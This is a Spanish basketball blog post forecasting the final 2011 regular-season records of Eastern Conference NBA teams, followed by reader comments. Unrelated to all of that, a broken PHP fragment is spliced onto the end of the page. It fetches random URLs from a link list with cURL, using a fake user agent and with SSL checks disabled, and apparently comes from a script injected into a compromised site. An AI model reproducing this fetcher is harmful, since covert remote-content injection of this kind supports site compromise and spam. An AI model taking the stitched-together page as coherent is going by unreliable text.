Autopista hacia los Playoffs 2011: Este

25 de March de 2011 por TheDeerHunter

Ya son ganas de complicarnos la vida, pero sabed que tras todos esos pronósticos con los que hemos mostrado al mundo nuestras vergüenzas aún no se nos han ido las ganas de mojarnos. Jugamos una vez más a ser adivinos y nos disponemos a compartir nuestra particular quiniela sobre lo que nos queda de temporada regular.

Chicago Bulls: 51-19 (.729) U10: 9-1.

Restan 6 partidos local y 6 visitante. 3 contra rivales del  Oeste y 9 del Este. 5 contra equipos que no se juegan nada. 2 duelos directos. Calendario cómodo.

Los Bulls andan dulces y todavía pueden verse más dulces. Les quedan dos partidos críticos: Celtics en casa y Orlando fuera. Podría ser suficiente ganar a los verdes en casa para asegurar la primera plaza del este, el MVP para Rose y el CoY para Thibodeau de una sola tacada. Antes tienen 3 compromisos incómodos, todos en casa, contra Memphis, Sixers y Phoenix. Me cuesta creer que vayan a sufrir en Milwaukee. De estos 4 choques deberían perder a lo sumo 1. Con lo apretado de su balance y mirando de reojo al Oeste no regalarán el último partido contra los Nets.

Pronóstico: 61-21 (.74)

Boston Celtics: 50-20 (.714) U10: 5-5

5 local – 7 visitante. 2 Oeste – 10 Este. 5 contra equipos que no se juegan nada. 3 duelos directos. Calendario inoportuno.

Coincide una mala racha y algunas dudas sobre el juego del equipo con noticias inquietantes sobre Shaquille O’nealy el silencio sobre los progresos de Jermaine. No es el mejor momento para tener que remontar en la clasificación con tanto partido fuera y todos los rivales jugándose la vida. Lo prioritario debería ser asegurar 8 victorias como mínimo y esperar a ver. Las cuentas podrían ser: vs Charlotte, @Minnesotta, vs Detroit, 2 contra Washington, contra New York en la última jornada cuando no se estén jugando nada y arañar como mínimo 2 victorias de 3 desplazamientos incómodos a Indianápolis, el Phillips Arena de Atlanta y el Álamo. Es posible que también logren triunfo contra los Sixers. Los asaltos al United y a Miami decidirán lo acertados que hemos estado.

Pronóstico: 59 – 23 (.719)

Miami Heat: 49-22 (.69) U10: 6-4

6 local – 5 visitante. 9 Este – 2 Oeste. 6 contra equipos que no se juegan nada. 1 duelo directo. Calendario fácil.

Con todo lo que les ha caído, los Heat van a perder muy pocos partidos disputados de aquí al final de la regular. El choque frente los Celtics en casa podría llegar a otorgarles la 2ª plaza y la ventaja en 2ª ronda, pero no dependen de si mismos para ello, pues además de la actual diferencia los verdes les ganan en el hipotético empate. Tras esa fecha, si no se juegan nada, que a nadie le extrañe que Spoelstra reserve jugadores, lo cual significa derrotas extra seguras para este caso en concreto.

Pronóstico: 58 – 24 (.707)

Orlando Magic: 46-26 (.639) U10: 6-4

5 local – 5 visitante. Todos en el Este. 4 contra equipos que no se juegan nada. 1 duelo directo. Calendario indiferente.

Llega tarde este buen momento de Orlando. No pueden alcanzar a los de arriba ni tampoco se sienten amenazados por los de abajo. Lo que queda les va a servir para hilar algún último ajuste o para disfrutar de días de relax y velar armas. Esta posición inhabilita a Howard para el MVP de este año, aunque el mérito individual de lo que ha hecho no se lo debe quitar nadie.

Pronóstico: 52 – 30 (.634)

Atlanta Hawks: 40-32 (.556) U10: 3-7

5 local – 5 visitante. 8 Este – 2 Oeste. 4 contra equipos que no se juegan nada. 6 de sufrir. Calendario difícil.

Cierto es que los Hawks simplemente han de decidir quien les pateará el culo en primera ronda, o Magic o (apriori) Heat. Suponiendo (y es mucho suponer) que les importe algo conservar la 5ª plaza va a tocar sudarla. La buena noticia es que quizás les sirva con 4 ó 5 victorias. La mala es que tienen cita estos próximos días con Orlando, Boston, Houston, San Antonio, Indiana y Miami. Incluso perdiendo todos esos choques podrían tenerlo hecho ganando lo que deben ganar. También es demasiado suponer que puedan hacerlo.

Pronóstico: 44 – 38 (.537)

Philadelphia 76ers: 37-34 (.521) U10: 6-4

7 local – 4 visitante. 9 Este – 2 Oeste. 4 contra equipos que no se juegan nada. 4 gallos. Calendario muy difícil.

La excelente campaña de los Sixers va a tener escaso premio. Su tope puede ser esta 6ª plaza por mucho que las sensaciones sean mejores que la de los que le preceden. Sus esperanzas de subir una plaza pasarían por ganar en Miami o en Chicago y el resto de choques de Marzo. A partir de ahí les quedaría una complicada, pero no imposible, visita al TD Garden y recibir a unos Magic que decidirán si quieren medirse a ellos en primera ronda. No es impensable que pasen a los Hawks.

Pronóstico: 43 – 39 (.524)

New York Knicks: 35-36 (.493) U10: 3-7

6 local – 5 visitante. 11 Este. 5 contra equipos que no se juegan nada. 3 gallos. Calendario indiferente.

Desconocemos a estas alturas cual es objetivo real de los Knicks. Da toda la impresión que ya se está pensando en el futuro (como siempre, vamos) y veremos en qué condiciones y con qué actitud se afronta la eliminatoria. Independientemente de todo eso ya no se juegan nada esta regular.

Pronóstico: 41 – 41 (.50)

Indiana Pacers: 32-40 (.444) U10: 5-5

7 local – 3 visitante.  8 Este – 2 Oeste. 4 contra equipos que no se juegannada. 2 gallos. 1 duelo directo. Calendario favorable.

Por momentos daba la impresiónde que serían capaces de mantener la plaza de postemporada aún con todos los empeños de sus rivales por evitarla. No es que les vaya la vida en ello pero sí parece que se han centrado en lograrla. Los Bucks tienen un calendario mucho más complicado que el suyo y tampoco se matarán por un premio relativamente venenoso. En mi opinión lo tienen hecho y me parece muy posible que logren el 50% de victorias en los partidos cómodos que les restan.

Pronóstico: 37 – 45 (.451)

Milwaukee Bucks: 28-42 (.40) U10: 5-5

4 local – 8 visitante.  11 Este – 1 Oeste. 5 contra equipos que no se juegan nada. 4 gallos. 1 duelo directo. Calendario imposible.

Los Bucks han mostrado su mejor cara últimamente pero su objetivo, con todas las incidencias que han tenido que sufrir, varias de ellas en el plano físico, no ha de ser necesariamente llevarse un palizón en postemporada. Además de la diferencia que mantiene Indiana, se enfrentan a un calendario rompepiernas si quieren afrontarla. Lo último que les iría bien a estas alturas. Vacaciones para ellos y quizás el sol brille el año que viene.

Pronóstico: 33 – 49 (.402)

Como cualquiera habrá podido intuir, incluyo a los Bobcats en ese grupo de equipos que no se juegan nada. Como dice Daimiel, es un equipo que se ha echado deliberadamente a la cuneta. Una estrategia como cualquier otra, siempre que no seas aficionado del equipo.

Comenta

6 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Yo quiero ver a los Sixers 6ºs enfrentandose a Miami, me parecen un rival muy jodido para los Heat y estan acostumbrados a morir en la cancha.

      Citar

  2. Denise dice:
    #2

    Bulls: 61/21. De lo que le queda, solo van a perder contra los Magic y contra los Knicks (ultimo viaje de la Regular Season con sus estrellas descansando para los playoffs)

    Celtics: 58/24. Perderán la 2º plaza porque van a perder 4 partidos (vs Pacers, Spurs, Heat y Bulls)

    Heat: 60/22 2º del Este, no van a perder ningún partido de los que le resta. Su calendario no puede ser más facil.

    Magic: 55/27. Solo tendrán un tropiezo frente a los Sixers.

      Citar

  3. Sancho88 dice:
    #3

    McGrady se ha comido a McGrady. Va a reventar

      Citar

  4. Sancho88 dice:
    #4

    Yo solo sé que Batum, a las 5:18 de la mañana, le acaba de hacer el mayor destrozo de su carrera a Manu Ginobili. El baloncesto se juega por encima de los tableros hoy en día. ¡QUÉ ANIMAL!

      Citar

  5. Sancho88 dice:
    #5

    Confirmado. No pudo ser. Finalmente ganaron los Bulls. Chicago tendrá que trabajar duro en las próximas jornadas, hoy palmaron

      Citar

  6. Txusma dice:
    #6

    De momento, Celtics ya pierde un partido y de los que no estaban previstos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>